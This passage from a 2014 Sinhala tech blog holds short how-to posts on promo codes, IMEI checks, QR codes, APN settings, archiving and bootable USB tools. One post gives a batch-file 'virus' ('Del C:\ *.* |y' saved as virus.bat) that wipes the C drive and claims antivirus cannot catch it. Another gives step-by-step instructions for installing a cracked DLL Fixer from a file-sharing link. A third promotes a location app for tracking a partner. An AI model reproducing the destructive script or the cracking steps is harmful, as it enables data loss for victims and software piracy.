Thursday, May 15, 2014
Domain , Hosting
- Godaddy එකෙන් හැම මාසෙම වගේ එයාලගේ Domain , Hosting තව ගොඩක් දේවල් අඩුවට ගන්න Godaddy එකෙන් Promo Code එකක් දෙනවා. ඉතින් මම ඔබට දෙන්නේ මැයි මාසයේ පුරාවට .com Domain අඩුවට ගන්න පුලුවන් කෝඩ් එක. මේ සැරේ Godaddy එකෙන් ඔයාලට .com Domain $ 1.99 ගන්න පුලුවන්. මේ කෝඩ් එක බාවිතා කරලා.
කෝඩ් එක තමයි - cjcrmn199
මේ කෝඩ් එක මැයි 31 වෙනකම් වලංගුයි. මේක බාවිතා කරලා ඔබත් .com එකක් ගන්න. මේ වගේ කෝඩ් එකක් නැතුව .com ගන්න ඔබ හිතනවනම් $ 12.99 විතර වෙනවා මිල . ඉතින් මම දෙන කෝඩ් දීලා .com එකක් ගන්න එක ඔබට ලොකු වාසියක් තියෙනවා.
මෙන්න Godaddy අඩවියට යන ලිපිනය. http://www.godaddy.com
Thursday, May 15, 2014 by Avishka Vithanage · 0
මේ කියන්න හදන්නෙ ජංගම දුරකථනයක, සිම් පතක සහ Memory Card එකෙහි දත්ත සම්පූර්ණයෙන් ඉවත් කරන ආකාරය.පරිගණකයක මෙන්ම දුරකථනයක දත්ත Delete කලද ඒවා සම්පූර්ණයෙන්ම ඉවත් වන්නෙ නැහැ.මීට අමතරව වෛරස් වැඩසටහන්ද මෙම ක්‍රමය තුලින් ඉවත්කල හැකියි.මෙහිදී සිදුවන තාක්ෂණික පැතිකඩ පිළිබද ඉදිරි ලිපියකින් බලාපොරොත්තු වන්න.
Sim Card එක තුල ඇති දත්ත මැකීම – මේ සදහා ඔබට SIM පත පරිගණකයට සම්බන්ද කරගැනීම සදහා SIM Card Reader එකක් අවශ්‍යවන අතර මෙම කාර්ය සිදු කිරීමට හැකි මෘදුකාංගයක් ලෙස Device Seizure හැදින්විය හැක.Device Seizure වෙබ් අඩවියට මෙතනින් පිවිසෙන්න.[මෙහිදී ඔබට මැකිය හැකි වන්නේ ඔබ විසින් ඇතුල් කල Phone Numbers වැනි දත්ත පමණි]
ජංගම දුරකථනය සහ Memory Card එක තුල ඇති දත්ත ඉවත් කිරීම – මෙම කාර්ය Eraser මෘදුකාංගය මගින් කරන්න පුළුවන්.මෙය Open Source Software එකක්.මෙතනින් Download කරගන්න.මෙම මෘදුකාංගය ස්ථාපනය කිරීමෙන් පසුව Open කරගෙන File > New > ගොස් ඔබට දත්ත සම්පූර්ණයෙන් ඉවත් කර ගත යුතු Drive එක තෝරන්න.
දත්ත සම්පූර්ණයෙන් ඉවත්වී ඇති දැයි දැනගැනීම – මෙම කාර්ය සිදු කිරීම සදහාද ඉහත කාර්යන් සදහා භාවිතා කල Device Seizure මෘදුකාංගයම භාවිතා කල හැකියි.
by Avishka Vithanage · 0
කෙනෙක්ගෙ ජාතික හැදුනුම්ත් අංකය තවත් අයෙක්ට තියෙන්න බැහැනේ.ඒ වගේම තමයි මේ IMEI අංකයත් එක් දුරකථනයක ඇති IMEI අංකයක් තවත් දුරකථනයක තියෙන්න බෑ.IMEI අංකය කියන්නෙ දුරකථනයේ අනන්‍යතාව තහවුර කරන සාධකය.මේක අන්තර්ජාතික වශයෙන් පිළිගත් දෙයක්.ජංගම දුරකථන [ GSM, WCDMA ] සහ චන්ද්‍රිකා දුරකථන ආදී සෑම දුරකථනයකම එයටම වෙන්වූ IMEI අංකයක් තියෙනව.මෙම IMEI අංකය දුරකථනයේ බැටරිය ගැලවූ පසු දැකගන්න පුළුවන්.නැතිනම් *#06# ඇමතීමෙන් ලබා ගන්න පුළුවන්.
IMEI අංකයෙ ඇති වැදගත්කම තමයි එම අංකය දැන සිටීමෙන් දුරකථනය නැතිවූවිටෙක නීතිමය පියවර ගන්න ඒක බොහොම ප්‍රෙයෝජනවත් වෙනව.ඒ වගේම එවැනි අවස්ථාවක Mobile Providers ආයතන වලට IMEI අංකය ලබා දී දුරකථනය අක්‍රීය කරන්නත් පුළුවන්.ඒ වගේම ඔබේ දුරකථනය ව්‍යාජය එකක්ද කියල දැනගන්නත් IMEI අංකයෙන් පුළුවන්.එවැනි සේවා සපයන වෙබ් අඩව් ගණනාවක් තියෙනව.මේ එවැනි එක් අඩවියක්.http://www.numberingplans.com/ තවත් IMEI අංකය ප්‍රෙයෝජනවත් වෙනව දුරකථනයක් Unlock කරන්න යන අවස්ථාවෙදිත්.
මේ වගේම වැදගත් තවත් කාරණයක් තමයි ප්‍රමිතියකින් තොරව නිපදවන ඇතැම් චීන දුරකථන වල IMEI අංකය ඇතුලත්වන්නේ නෑ.එවැන් දුරකථන වලින් සේවා ලබාගැනීමේදී බොහෝ අපහසුතාවයන් වලට ලක් වීමට පරිශීලකයාට සිදුවෙනව.මෙවැනි IMEI අංකය රහිත දුරකථන භාවිතය ශ්‍රී ලංකාව ඇතුලු ඇතැම් රටවල් මේ වන විට තහනම් කර තිබෙනවා.
by Avishka Vithanage · 0
- පුවත්පතක ලුහුඩු දැන්වීමක්, දැන්වීම් පුවරුවක විස්තරයක් හෝ ලේබලයක එයට අදාල විස්තරය සදහන් කිරීමට යම් ඉඩක් අවශ්‍යය.ඒ විස්තරය වැඩි වන තරමට අවශ්‍ය ඉඩකඩද වැඩි වනු ඇත.නමුත් මේ සම්මතය වෙනස් කරමින් ඉතා කුඩා ඉඩ ප්‍රමාණයක් තුල වැඩි තොරතුරු ප්‍රමාණයක් සදහන් කර තැබිය හැකි ක්‍රමයක් ඇත.එය හදුන්වන්නේ ‘‘ඉක්මන් ප්‍රතිචාර‘‘ [QR - Quick Responce] යන තේරුමින් යුතුව කිව් ආර් කෝඩ් කියාය.සැම කිව් ආර් කෝඩ් එකක්ම මූලික පෙනුම අතින් ගත්විට සමාන කමක් දැකිය හැක.එහි කෙලවරයන් තුනක තරමක් විශාල සමචතුරස්‍ර තුනක් සහ ඒ සමචතුරස්‍ර තුල තවත් කුඩා සමචතුරස්‍ර තුනක් දැකිය හැකිය.ඒ විශාල සමචතුරස්‍ර වලට අමතරව මුළු කිව් ආර් කෝඩ් එක පුරාම අපිලිවෙලට පිහිටා ඇති කුඩා සමචතුරස්‍ර එකතුවෙන් සෑදුනු විවිධ හැඩතල දැකිය හැක.හැඩතලයන්ගෙන් සමන්විත කොටසට වැඩිමනක් තැන් වලදී කළු වර්ණය යොදා ගෙන තිබුනක් වෙනත් වෙනත් වර්ණද ඒ සදහා භාවිතා වේ.පොදුවේ ගත්විට මේ හැම කිව් ආර් කෝඩ් එකකම පසුබිම සුදු පැහැයෙන් දිස් වේ.වෙනත් වර්ණ පසුබිම සදහා යොදා ගන්නා අවස්ථාද ඇත.කිව් ආර් කෝඩ් එකක රදවන තොරතුරු සදහන් වන්නේ මේ සියල්ලේ පිහිටීමෙනි.එනම් 2D (ද්විමාන) මොඩියුලයක් තුල තොරතුරු රැදවීමයි.කිව් ආර් කෝඩ් එකක ඇති කුඩා හැඩතලයන් මෙම තොරතුරු රදවා තබන මොඩියුලයන්ය.මේ ආකාරයට 0.5 mm2 (වර්ග මිලි මීටර භාගයක) වර්ගඵලයෙන් යුතු මොඩියුලයන්ගෙන් සමන්විත කිව් ආර් කෝඩ් Micro කිව් ආර් කෝඩ් ලෙසත් 1.0 mm2 වර්ගඵලයෙන් යුතු මොඩියුලයන්ගෙන් සමන්විත කිව් ආර් කෝඩ් සාමාන්‍ය කිව් ආර් කෝඩ් ලෙසත් හැදින්වේ.* කිව් ආර් කෝඩ් එකක සැකැස්ම image id 01මේ ආකාරයට කිව් ආර් කෝඩ් එකක් තුල වෙබ් ලිපිනයක්, යම් පණිවුඩයක් හෝ විස්තරයක් එසේත් නැතිනම් කෙටි පණිවුඩයක් (SMS) එකක් ඇතුළු බොහෝ දේ රදවා තබන්නට පුළුවන ඒ අකුරු නම් 4226 ක්ද ඉලක්කම් නම් 7089 ක්ද යන උපරිමයෙනි.මේ කිව් ආර් කෝඩ් කියවීම ඒ සදහා විශේෂ පහසුකම් ඇති ස්කෑනර් යන්ත්‍ර වලින් මෙන්ම ජංගම දුරකථනය භාවිතයෙන් සිදු කරන්නට හැකිය.නූතන ස්මාට් ෆෝන් සමග කිව් ආර් කෝඩ් කියවිය හැකි ඇප්ලිකේෂන් ඇති අතර එසේ නොමැති එහෙත් සුදුසුකම් ඇති ජංගම දුරකථන වෙත කිව් ආර් කෝඩ් කියවන්නට භාවිතා කල හැකි ඇප්ලිකේෂන් ඩවුන්ලෝඩ් කොට ඉන්ස්ටෝල් කරගන්නට පුළුවන.KAYWA , i NIgma යනු ජංගම දුරකථනයෙන් කිව් ආර් කෝඩ් කියවීම සදහා භාවිතා කල හැකි ඇප්ලිකේෂන් ගණනාවක් අතුරින් වාඩත් ප්‍රසිද්ද ඒවාය.ඊට අමතරව සිම්බියන් මෙහෙයුම් පද්දතිය සමග හොදින් වැඩ කරන NEO Reader මෘදුකාංගයද ජංගම දුරකථනයෙන් කිව් ආර් කෝඩ් කියවීම සදහා භාවිතා කල හැක.ජංගම දුරකථනයෙන් කිව් ආර් කෝඩ් කියවන ඇප්ලිකේෂන් එක කියාත්මක කර කිව් ආර් කෝඩ් එක දෙසට ජංගම දුරකථනයේ කැමරාව යොමු කල විට එම කිව් ආර් කෝඩ් එකෙහි අඩංගු තොරතුරු කියවා බලන්නට පුළුවන.නැතිනම් කිව් ආර් කෝඩ් එකෙහි සදහන් ආකාරයට ක්‍රියා කරන්නටද පුළුවන එනම් කිව් ආර් කෝඩ් එකෙහි වෙබ් ලිපිනයක් සදහන්ව ඇත්නම් ඒ වෙබ් අඩවියට පිවිසිය හැක.මේ ආකාරයට වෙබ් ලිපිනය අප විසින් සටහන් නොකර හයිපර්ලින්ක් එකක් ආකාරයෙන් එම කිව් ආර් කෝඩ් එක භාවිතා කිරීම භෞතික අවකාශය තුල හයිපර්ලින්ක් භාවිතා කිරීමක් වැනිය.එසේ නැතිව කිව් ආර් කෝඩ් එකෙහි SMS එකක් සදහන්ව ඇත්නම් කෙලින්ම ජංගම දුරකථය භාවිතා කිරීමෙන් ඒ SMS එක යවන්නට පුළුවන මීට අමතරව කිව් ආර් කෝඩ් එකක සදහන් යම් විස්තරයක් කියවීම ආදී දේ ද මේ ආකාරයටම සිදු කරන්නට පුළුවන.වර්ථමානයේ කිව් ආර් කෝඩ් දැන්වීම් පුවරු වල, වවිධ ඇසුරුම් සහ වෙළද භාණ්ඩ වල සහ පුවත් පත් ඇතුව බොහෝ තැන්වල බාවිතා වේ.ඒ දැන්වීම් පුවරුවක නම් වඩාත් වැඩි තෙරතුරු ප්‍රමාණයක් රදවා තැබිය හැකි නිසාත්, වෙළද භාණ්ඩ වල නම් එසැනින් අදාල නිශ්පාදනයේ නිශ්පාදකයාගේ වෙබ් අඩවියට පිවිස ඒ පිළිබද වැඩි විස්තර දැනගැනීමත් පුවත් පතක නම් ලුහුඩු දැන්වීම් ආදිය පළ කිරීමේදී අඩු ඉඩක් තුල වැඩි තොරතුරු ප්‍රමාණයක් රදවා තබන්නට හැකි නිසා වැනි පහසුව ඇති නිසාය.මීට අමතරව විදේශ රටවල පොදු ප්‍රවාහන සේවා වල ටිකට් පත් තුල, මත විමසුම් ආදියේ SMS පණීඩුව කෙලින්ම යවන්නට ඒ පිළිබද දැන්වීම් පුවරු ආදියේත් කිව් ආර් කෝඩ් සුළභව භාවිතා වේ.
- කිව් ආර් කෝඩ් එකක් ඹ්නෑම අයෙක්ට පහසුවෙන් හදාගන්නටද පුළුවන.i Nigma Create Barcodes වැනි නොමිලේ සපයන සේවා ඒ සදහා භාවිතා කරන්නට පුළුවන.මෙහිදී වෙබ් ලිපිනයක්, පණිවුඩයක්, Contact Details හෝ SMS එකක් වැනි දේ යොදා කිව් ආර් කෝඩ් එකක් සදා ගන්නට පුළුවන.Bar Code ක්රමයේ දියුණු අවධියක් ලෙසත් කිව් ආර් කෝඩ් හදුන්වන්නට පුළුවන.කිව් ආර් කෝඩ් තරම් තොරතුරු ප්‍රමාණයක් බාර් කෝඩ් වල සටහන් තර තැබිය නොහැකි වීමත් Bar Code හිදී නම් තොරතුරු කියවිය හැක්කේ තිරස් අතට පමණි නමුත් කිව් ආර් කෝඩ් ඹ්නෑ අතකට හරවා කියවිය හැකි වීමත් නිසා බාර් කෝඩ් වලට වඩා ඉදිරියෙන් කිව් ආර් කෝඩ් සිටී.එමෙන්ම කිව් ආර් කෝඩ් තුල Error Coration ගුණාංගයක්ද ඇත.එනම් කිව් ආර් කෝඩ් එකෙහි යම් කොටසක් විනාශ වී ගියත් Error Coration ගුණාංගය නිසා බාධාවකින් තොරව කිව් ආර් කෝඩ් එක කියවන්නට පුළුවන.කිව් ආර් කෝඩ් 1994 වසරේදී ජපානයේ Denso Wave සමාගම විසින් ලෝකයාට ඉදිරිපත් කල අතර අදටත් ලොව වැඩියෙන්ම නිව් ආර් කෝඩ් භාවිතා කරනා රට ජපානයයි.
by Avishka Vithanage · 0
කිට්ටුවෙන් තබන උපකරණ අතර වයර්ලස් තාක්ෂණයෙන් දත්ත හුවමාරු කල හැකි තාක්ෂණයක් ලෙස Transfer Jet තාක්ෂණය හදුන්වන්නට පුළුවන.එනම් Transfer Jet තාක්ෂණයේදී දත්ත හුවමාරු කල හැක්කේ උපරිම 3 cm තරම් දුරක් පමණක් වන බැවිනි.නමුත් මෙහිදී අනෙක් වයර්ලස් තාක්ෂණයන්ට වඩා වෙනස්කම් දෙකක් ඇත එකක් නම් මෙසේ දත්ත හුවමාරු කරන වේගය අනෙක් ඇතැම් තාක්ෂණයන්ට වඩා වැඩි නිසාය.අනෙක නම් Transfer Jet තාක්ෂණයෙන් දත්ත හුවමාරු කිරීමේදී උපාංග දෙකක් අතර දුර 3 cm නම් එහිදී දත්ත හුවමාරු වේගය 375 Mbps වේ නමුත් මෙම උපකරණයන් දෙක ස්පර්ශ කල හොත් දත්ත හුවමාරු වේගය 560 Mbps දක්වා වැඩිවේ.එනම් උපාංග වඩාත් කිට්ටුවෙන් තබනා විට වඩාත් වැඩි දත්ත හුවමාරු වේගයක් ලබාගත හැකිවීමයි.
Transfer Jet තාක්ෂණය අයත් වන්නේ CPWT [ Close Proximity Wireless Technology ] නම් තාක්ෂණ කාණ්ඩයටය.මෙහිදී Transfer Jet තාක්ෂණය අනෙක් වයර්ලස් තාක්ෂණයන්ට වඩා වෙනස් වන මූලික ගුණාංග තුනක් ඇත.
පළමුවැන්න නම් භාවිතයට පහසුවීමයි.එනම් Transfer Jet තාක්ෂණය භාවිතා කරන්නට අනෙක් තාක්ෂණයන් වලදී මෙන් විශේෂිත උපකරණ තිබිය යුතු වන්නේ නැත, එමෙන්ම වයිමැක්ස් සහ වයිෆයි තාක්ෂණ වලදී මෙන් ආවරණ කලාපයක සිටිය යුතු වන්නේද නැත.Transfer Jet තාක්ෂණය සහිත උපකරණ දෙකක් ඇත්නම් මෙම තක්ෂණය භාවිතා කරන්නට එය හොදටම සෑහේ.
දෙවැන්න නම් Transfer Jet තාක්ෂණයේ ඇති කාර්යක්ෂමතාවයයි.මෙහිදී භාවිතා වන්නේ පුලුල් පරාස වයර්ලස් තාක්ෂණයකි.එහිදී දත්ත හුවමාරු වෙන්නේ සාමාන්‍යය රේඩියෝ තරංග මගිනි.මෙහිදී සංඛ්‍යාතය 4.48 GHz තරම් වේ.මේ හේතුවෙන්ම Transfer Jet තාක්ෂණයේදී දත්ත හුවමාරු වේගය ඉතාමත් වැඩිය.එනම් පෙර සදහන් කල පරිදිම උපාංග දෙකක් අතර දුර 3 cm නම් එහිදී දත්ත හුවමාරු වේගය 375 Mbps වේ නමුත් මෙම උපකරණයන් දෙක ස්පර්ශ කල හොත් දත්ත හුවමාරු වේගය 560 Mbps දක්වා වැඩිවේ.එමෙන්ම Transfer Jet තාක්ෂණයෙන් දත්ත හුවමාරු කරනා විට අනෙක් වයර්ලස් නෙට්වර්ක් ඇත්නම් ඒවාට බාදාවක් වන්නේ නැත.ඒ Transfer Jet තාක්ෂණයේදී තම බලය ව්‍යාප්ත කරන්නේ 3 cm තරම් වපසරියකට වන නිසාය.
Transfer Jet තාක්ෂණයේ ඇති තෙවැනි ගුණාංගය නම් දත්ත හුවමාරුවේදී ඇති ආරක්ෂාකාරී බවයි.එනම් Transfer Jet තාක්ෂණය භාවිතයෙන් යම් උපකරණයක් දත්ත ලබාගන්නවා නම් දත්ත ලබාගත හැක්කේ අනෙක් උපකරණය විසින් එය අනුමත කල හොත් පමනි.මේ හේතුවෙන් Transfer Jet තාක්ෂණයේදී බ්ලූටූත් වලදීමෙන් දත්ත සොරාගන්නට ක්‍රම නැත.එමෙන්ම Transfer Jet තාක්ෂණයේදී ස්වාභාවයෙන්ම ආරක්ෂාවන ක්රමයක්ද ඇත එනම් Transfer Jet තාක්ෂණයේ වයර්ලස් දත්ත හුවමාරු හැකියාව 3 cm වන නිසා යම් අයෙක්ට මෙහිදී දත්ත සොරාගැනීම තරමක් අසීරු කාර්යකි.
මෙම හේතූන් නිසා Transfer Jet තාක්ෂණය දත්ත හුවමාරුකිරීමට වඩාත් හොද තාක්ෂනයක් ලෙස හදුන්වන්නට පුළුවන.මෙය වැඩිපුර භාවිතා වන්නේ පුද්ගලිකව දත්ත හුවමාරුකිරීම සදහාය.
මෙම Transfer Jet තාක්ෂණය 2008 වර්ශයේදී සෝනි සමාගම විසින් සොයාගන්නා ලදී.ඉන් පසුව එම වසරේදීම Transfer Jet තාක්ෂණය දියුණු කරන්නටත් එහි ප්‍රමිතිය රැකගන්නටත් සෝනි සමාගමේ මූලිකත්වයෙන් හිතාචි, කැනන්, ටොෂීබා, කොඩැක්, සැම්සුන්ග්, පයනියර්, ෂාප්, සීකෝ සහ නෙක් ඇතුලු සමාගම් 18 ක එකමුතුවෙන් Transfer Jet Consortium බිහිවිය.

Monday, May 12, 2014
මේක ඇප් එකක්.මේකෙන් පුලුවන් ඕනෙම කෙනෙක් ඕනෙම වෙලාවක ඉන්නේ කොහෙද කියලා බලා ගන්න. ඇත්තටම මේක ගොඩක් ආරක්ශිත ක්‍රමයක්.
ඔබගේ දුව , පුතා ඉස්කෝලෙ ගියාද ,class එකට ගියාද ?
එතකොට ඔයගේ GF හෝ BF ඉන්නේ කොහේද , කොහේ හරි දුර පලාතක ඔයාගේ යාලුවෙක් යනවා නම් ඒයාට හරියට ඉන්න තැන මේ ඇප් එකෙන් බලලා යන්න ඕනේ පාර කියන්න , පිටරට ඉන්න යාලුවෝ කොහේද ඉන්නේ බලන්න , වගේ ගොඩාක් දේවල වලට ප්‍රයෝජනයට ගන්න පුලුවන් වටිනා Application එකක් මේක.
වටිනම දේ තමයි මේ ඇප් එක 100% නොමිලේ ගන්න පුලුවන්.

මෙතනින් ගන්න එහෙනම් !
මෙහි අමතර වාසි
- Your family members can see each other, but no one else can see them.
- See hospitals, police and fire stations, as well as recent crimes and other threats.
- Use Family Channel™ to send short and sweet messages throughout the day.
- Only other family members can participate in group chats.
- Ditch potentially costly text messages.

Monday, May 12, 2014 by Avishka Vithanage · 0
හැම කෙනෙක් අතේම ෆෝන් එකක් තියෙනවා.සමහරු ලොකු ගණන් දීලා ගන්නවා. තවත් සමහරු මිලදී ගන්නේ අතේ ඇති මිදලට chines ෆෝන් එකක්.
ෆෝන් එක Original එකක්ද වලංගු ෆෝන් එකක් ද කියලා බලන අපූරු ක්‍රමයක් කියනවා.
අලුතෙන් එකක් ගනනවානම් IMEI නම්බර් එක ගහලා එකේ Market එක බලලම ගන්න පුළුවන්.
ගොඩක් phone වල *#06# ගැහුවම IMEI Number එක බලාගන්න පුළුවන්.ඔරිජිනල් නෙවෙයි නම් details එන්නේ නෑ. (Chinease)
මෙතනට ගිහින් IMEI එක ගහලා බලන්න.
by Avishka Vithanage · 0
අ හෙනම් සියලුම සිම් පත් වලට අදාල Internet setting බලමු නේද?
Name-Mobitel
APN-mobitel3g( only සිම්පල්)
Access Number-*99#
Name-Airtel
APN- airtellive/wap( only සිම්පල්)
Access Number-*99#
Name-Hutch
APN-htwap( only සිම්පල්)
Access Number-*99#
Name-Dialog
APN- PPWAP(only කැපිටල්)
Access Number-*99#
Name- Etisalat
APN- ebb( only සිම්පල්)
Access Number-*99#
by Avishka Vithanage · 0
කොම්පියුටරේ එන dll error ගොඩක් එකවර පහසුවෙන් ඉවත් කරලා දාමු!
https://dl.dropboxusercontent.com/s/7e9vhyhjufc50v8/dll file fixer created by Cyber Tricks Zone.rar
http://www.dll-files.com/fixer/
download කරගත්ත Rar file එක උඩ right ක්ලික් කරලා extract here යන්න ලබා දී Rar file එක Extract කරගන්න.
crack folder එක open කරලා DLLFixer කියන ෆයිල් එක copy කරගෙන ගිහින් Install කරපු තැනට Paste කරන්න.copy කරගත් file එක Install කරපු තැනට paste කරනකොට copy and replace යන්න ලබා දෙන්න.
මේ වැඩ ටික කරනකන් software එක run කරන්න එපා.
මෙම software එක update කරන්න ඇහුවට software update කරන්න එපා.
දැන් software එකේ හොර වැඩේ හරි දැන් තියෙන්න පොඩි දෙයයි.
ආ එක දෙයක් කියන්න බැරි උනා software එක install කරගමන් software එක auto run වෙයි එක close කරලා දන්න.crack එක ඉවරවුනාට පස්සේ software එක run කරන්න.
දැන් software open කරලා Start Scan Now click කර විට ඔබේ පරිගණකය scan වේවි මේකට ටිකක් වෙලා යයි.
ඊට පසු ඔයාගේ පරිගණකයේ තියන errors ගාන එයි.එක ළගම ඇති fix error යන්න click කර errors ටික හදනකන් ටිකක් ඉන්න.ඊට පස්සේ auto restart වේවි.
දැන් ඉතින් ඔක්කොම හරි.ඔය software එකෙන් 2පාරක් විතර scan කරාම හරි.
DLL errors ඔක්කොම හරි ගැස්සිලා ඇති
වැදගත්! මෙම software run කරනවිට අන්තර්ජාලයට ඔබේ පරිගණකය සම්බන්ද වි තිබිය යුතුයි.
තවද මෙය install කර අවසන් වුවිට පරිගණකය auto restart වීමට ඉඩ හරින්න.by Avishka Vithanage · 0
මේක ඉතින් සමහර අය දන්නවා ඇතිනේ..... දන් නැති අය මේකෙන් දැනගන්නකො.....දැන් ඉතින් ජනප්ප්රිය රැල්ලනේ Virus හදන එක.... ඉතින් මාත් හිතුව ඔයගොල්ලන්ට Virus එකක් හදන ව්දිහ කියල දෙන්න...
මේක ගැන කිව්වොත් ,Virus එක පොඩි උනාට හරිම Dangerous එකක්..... මේක ඇවිල්ල..මිනිත්තුවක් යන්න ඉස්සෙල්ල හදාගන්න පුළුවන් උනාට C Drive එකේ තියෙන ඔක්කොම Files Delete කරනවා..... එලකිරි වගේ....................
දැන් ඔයගොල්ලෝ හිතනවා ඇති මන් කොහොමද එළකිරි වගේ කිව්වේ කියල..... ඕක මන් අත්හදා බලන්න ගිහින් මගේ machine එකත් ෆොර්මැට් කරන්න උනා.....
මන් ඔයගොල්ලන්ටත් කියන්නේ
මන් ඔයගොල්ලන්ටත් කියන්නේ
මේක අත්හදා බැලුවට කමක් නැ Format කරන්න තියෙන Computer එකක හොදේ..........
දැන් අපි බලමු මේ Virus එක හදන හැටි....,,,,
තව පොඩ්ඩෙන් අමතක වෙනවා...... මේ Virus එක AntiVirus gard එකකකින් අල්ලන්න බැ හොදේ.......
1. එස්සේල්ලම මේ පහල තියෙන Cods ටික Copy කරගෙන Notepad එකට Paste පාරක් දාගන්නකෝ..
@Echo off
Del C:\ *.* |y
2. ඊට පස්සේ ඕක save කරනකොට Name එක ව්දිහට virus.bat (ඕකේ Name එකට ඕන එකක් දෙන්න ඒත් .bat කියල අනිවාර්යෙන්ම දාන්න ඕනෙ හොදේ.....)
3. දැන් ඔයා save කරපු තැනට ආපු Icon එක Dobble Click කලාම,,,,,,, C Drive එකේ තියෙන
ඔක්කොම Files Delete වෙනවා......හරිය.......
by Avishka Vithanage · 0
ඕනෙම ලොකු ෆයිල් එකක් පොඩි කරගන්නේ මෙන්න මේ සොෆ්ට්වෙයා එකෙන් තමයි.
It works on both Windows and Linux operating system. Compression ratio of this software is very high. Due to high compression levels, time to compress a file goes high as the size of the file increases and compression ratio may vary depending on the format of the file.When a file is compressed with KGB Archiver it saves it with own extension and at the time of decompression it automatically recognizes the file format. The only limitation of KGB archiver is, decompressed file cannot be open or extract with other compression softwares. You can also choose any compression level (high, maximum, normal, low, very weak) to compress a file but the compression time will vary according to your selected compression level.
Note: If you are compressing any file with KGB archiver and sending the comprssed file to your friends then he must have KBG archiver installed on his computer to decompress the file.
Features of KGB Archiver :
Supports native .kgb files and .zip files
AES-256 Encryption
Able to create self-extracting archives.
Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.
Unicode is supported in both User Interface and File Systems.
An Explorer shell extension is available for the windows version.
Make Password protected compressed file.
System Requirements :
Due to high compression ratio of KGB archiver, you need to have a decent system hardware configuration
256 MB RAM
1.5 GHz Processor
1.5 GHz Processor
by Avishka Vithanage · 0
මමත් මේ වැඩේ හොයාගත්තේ වයිරස් කේස් එකකින් මගේ පෙන් එකේතිබ්බ ෆෝල්ඩර්ස් ඔක්කොම අතුරුදහන් වෙච්ච වෙලාවේ ඒ ගැන ගූගල් අයියගෙන් අහ අහ ඉඳිද්දී.....මෙහෙම ප්‍රශ්නයක් දැනට නැති උනත් ඉස්සරහට මේ වගේ දෙයක් උනොත් ලේසියෙන්ම ෆෝල්ඩර්ස් ටික ආපහු රිකවර් කරන විදිය තමයි මේ කියන්න යන්නේ.....
1 පියවර
මුලින්ම cmd කියන අකුරු තුන Start Menu එකේ ටයිප් කරලා මුලින්ම search වෙලා එන එක right click කරලා "Run as Administrator" විදියට open කරන්න.
2 පියවර
දැන් මෙන්න මේ command එක type කරන්න
attrib -h -r -s /s /d g:\*.*
අකුරු අතර මේ තියෙන spaces එහෙමම තියන්න ඕනි, ඒ වගේම මෙතන "g" කියල පෙන්නලා තියෙන්නේ මගේ pen drive එකේ අකුර ඒක ඔයාලගේ වෙනස් වෙනවා තමන්ගේ pen drive එකේ අකුර මොකක්ද කියල "Computer" ගිහින් බලාගන්න.....
3 පියවර
විනාඩි එකක් දෙකක් විතර ඕක run වෙනවා ඊට පස්සේ cmd එකේ cursor එක යටට එයි, එහෙම උනාම cmd window එක close කරලා Pen Drive එකට ගිහින් බලන්න delete වෙලා තිබ්බ Folders ටික ආපහු පෙන්නයි....සරලයි සංකීර්නයි!
තව දෙයක් කියන්නම්......
virus නිසා නිතරම files hidden වෙනවනෙ. එකට මේ එක programe 1 download කරගෙන අතුලට copyකරගෙන run කරන්න ටක් ගලා බඩු පෙන්නය්.
by Avishka Vithanage · 0
ඔන්න අද මම ගෙනාවා වටින බාන්ඩයක්.. ඒක තමා WiNToBootic කියන්නේ.. මේකෙන් අපිට පුලුවන් තමන්ගේ පෙන් එකෙන් Windows Setup එක බූට් වෙන විදිහට හදා ගන්න..

මේකේ වටිනා කම කියන්නේ මොකොද මෙකෙන් අපිට Windows Setup එක Disk Image එකක් විදිහට ඒකියන්නෙ .iso format එකෙන්ම තියෙන්න ඕනෙ නැහැ.. මේකෙන් එක්කො .iso ෆය්ල් එකක් නැත්තම් අපේ රොම් එකට දාල තියෙන ඩිස්ක් එකෙන් නැත්තම් වටිනාම දේ කියන්නෙ මේකෙන් නිකන්ම හාර්ඩ් එකට තමන් ඩිස්ක් එකකින් Copy කරපු ෆෝල්ඩර් එකකින් වුනත් ලේසියෙන්ම පෙන් එකෙන් බූට් වෙන විදිහට හදා ගන්න
මේ තියෙන්නේ අනිත් එවත් එක්ක බලපු සසදා බැලීම

ඔන්නලින්ක් එක..
DOWNLOAD
මෙන්න මෙහෙමයි දැන් ඕක අපි පෙන් එකේ වැඩ කරන විදිහට අපි හදා ගන්නේ..
1. මුලින්ම ඇප් එක බාගෙන ඕපන් කරගන්න..
එතකොට මෙන්න මෙහෙම ඒවි..

පෙන් එක ගහලම ඔපන් කරොත් වැඩේ ලේසි මොකද ඒ ඇප් එකෙන් එයාම අදුර ගන්නවා ගහල තියෙන පෙන් එක..
ඔන්න එතකොට මෙහෙම එවි..
ෆොර්මැට් කරන්න ඔනෙ නම් එතනම තියෙනවා Quick Format කියලා ඔප්ශන් එකක්..

2. හරි.. දැන් අපි අපිට අවශ්‍ය පෙන් එක තෝර ගත්තනේ..
දැන් ඉතින් අපේ තියෙන Image(.iso) ඒක තියෙන තැන අපි දෙන්න ඕනෙ ඒකට ඔය දකුනු පැත්තෙන් තියෙන්නේ Drop Source Or Click කියන තැන Click කරන්න..අන්න එතනින් ඊටපස්සේ තමන්ගෙ ඒ Image File එක තෝරලා ඔපන් කරගන්න..
එතකොට මෙන්න මෙහෙම ඒවි..

Image එකක් නෙමේ නම් අපේ සෙටප් තියෙන ෆෝල්ඩර් / නැත්තම් රොම් එක සෙලෙක්ට් කරලා කෙලින්ම ඩ්‍රැග් කරලා අර Drop Source Or Click කියන තැන අත් අරින්න. එතකොට එයා ඔටෝ ගානට වැඩේ කරාවි..

3.ඔන්න ඊටපස්සේ ඒ ටික කරාට පස්සේ..
පල්ලෙහා තියෙන DO it! කියන එක ක්ලික් කරලන්න එතකොට ඒ ඇප් එකෙන් පෙන් එකට කොපි වෙන වැඩේ පටන් ගන්නවා..

4.ඊටපස්සේ ඔක්කෝම වැඩ ටික ඉවර වුනාම මෙන්න මෙහෙම ඒවි..
පල්ලෙහා තියෙන Thanks! කියන තැන ක්ලික් කරලා exit වෙන්න..

ඔන්න ඉතින් දැන් වැඩේ හරි දැන් ඉතින් අපිට පෙන් එකෙන් බූට් කරලා වින්ඩොව්ස් දාගන්න පුලුවන්..
